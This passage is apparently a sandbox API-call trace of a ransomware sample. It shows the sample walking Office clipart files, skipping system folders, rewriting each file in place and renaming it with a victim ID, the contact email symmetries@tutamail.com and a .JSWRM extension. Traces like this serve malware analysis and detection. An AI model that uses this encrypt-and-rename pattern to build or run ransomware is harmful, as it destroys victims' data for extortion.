GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22272) returned 1 [0088.390] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5700) returned 0x24d210 [0088.391] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5700, lpOverlapped=0x0) returned 1 [0088.398] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.398] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5700, lpOverlapped=0x0) returned 1 [0088.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.398] CloseHandle (hObject=0x314) returned 1 [0088.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0088.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0088.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0088.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0088.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0088.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.399] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237228.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237228.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0088.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.400] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0237336.WMF", cAlternateFileName="")) returned 1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2=".") returned 1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="..") returned 1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="...") returned 1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="windows") returned -1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="recovery") returned -1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="perflogs") returned -1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="documents and settings") returned 1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="system volume information") returned -1 [0088.400] lstrcmpiW (lpString1="J0237336.WMF", lpString2="msocache") returned -1 [0088.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0088.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237336.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237336.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237336.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0088.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0088.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237336.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237336.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237336.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0088.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237336.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.402] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24770) returned 1 [0088.402] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60c0) returned 0x24d210 [0088.402] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x60c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x60c0, lpOverlapped=0x0) returned 1 [0088.405] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.405] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x60c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x60c0, lpOverlapped=0x0) returned 1 [0088.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.405] CloseHandle (hObject=0x314) returned 1 [0088.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0088.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0088.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0088.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0088.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0088.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.405] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237336.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237336.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0088.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.406] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51be, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0237759.WMF", cAlternateFileName="")) returned 1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2=".") returned 1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="..") returned 1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="...") returned 1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="windows") returned -1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="recovery") returned -1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="perflogs") returned -1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="documents and settings") returned 1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.406] lstrcmpiW (lpString1="J0237759.WMF", lpString2="system volume information") returned -1 [0088.407] lstrcmpiW (lpString1="J0237759.WMF", lpString2="msocache") returned -1 [0088.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237759.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237759.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237759.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0088.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237759.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0237759.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0237759.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0088.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237759.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.408] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20926) returned 1 [0088.408] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24d210 [0088.408] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x51b0, lpOverlapped=0x0) returned 1 [0088.411] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.411] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x51b0, lpOverlapped=0x0) returned 1 [0088.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.411] CloseHandle (hObject=0x314) returned 1 [0088.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0088.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0088.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0088.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0088.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0088.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.411] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237759.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237759.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0088.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.412] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0238333.WMF", cAlternateFileName="")) returned 1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2=".") returned 1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="..") returned 1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="...") returned 1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="windows") returned -1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="recovery") returned -1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="perflogs") returned -1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="documents and settings") returned 1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="system volume information") returned -1 [0088.412] lstrcmpiW (lpString1="J0238333.WMF", lpString2="msocache") returned -1 [0088.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0088.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238333.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238333.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238333.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0088.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0088.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238333.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0238333.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0238333.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0088.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238333.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.413] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22944) returned 1 [0088.413] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x59a0) returned 0x24d210 [0088.413] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x59a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x59a0, lpOverlapped=0x0) returned 1 [0088.416] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.416] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x59a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x59a0, lpOverlapped=0x0) returned 1 [0088.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.416] CloseHandle (hObject=0x314) returned 1 [0088.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.417] RtlAllocateHeap 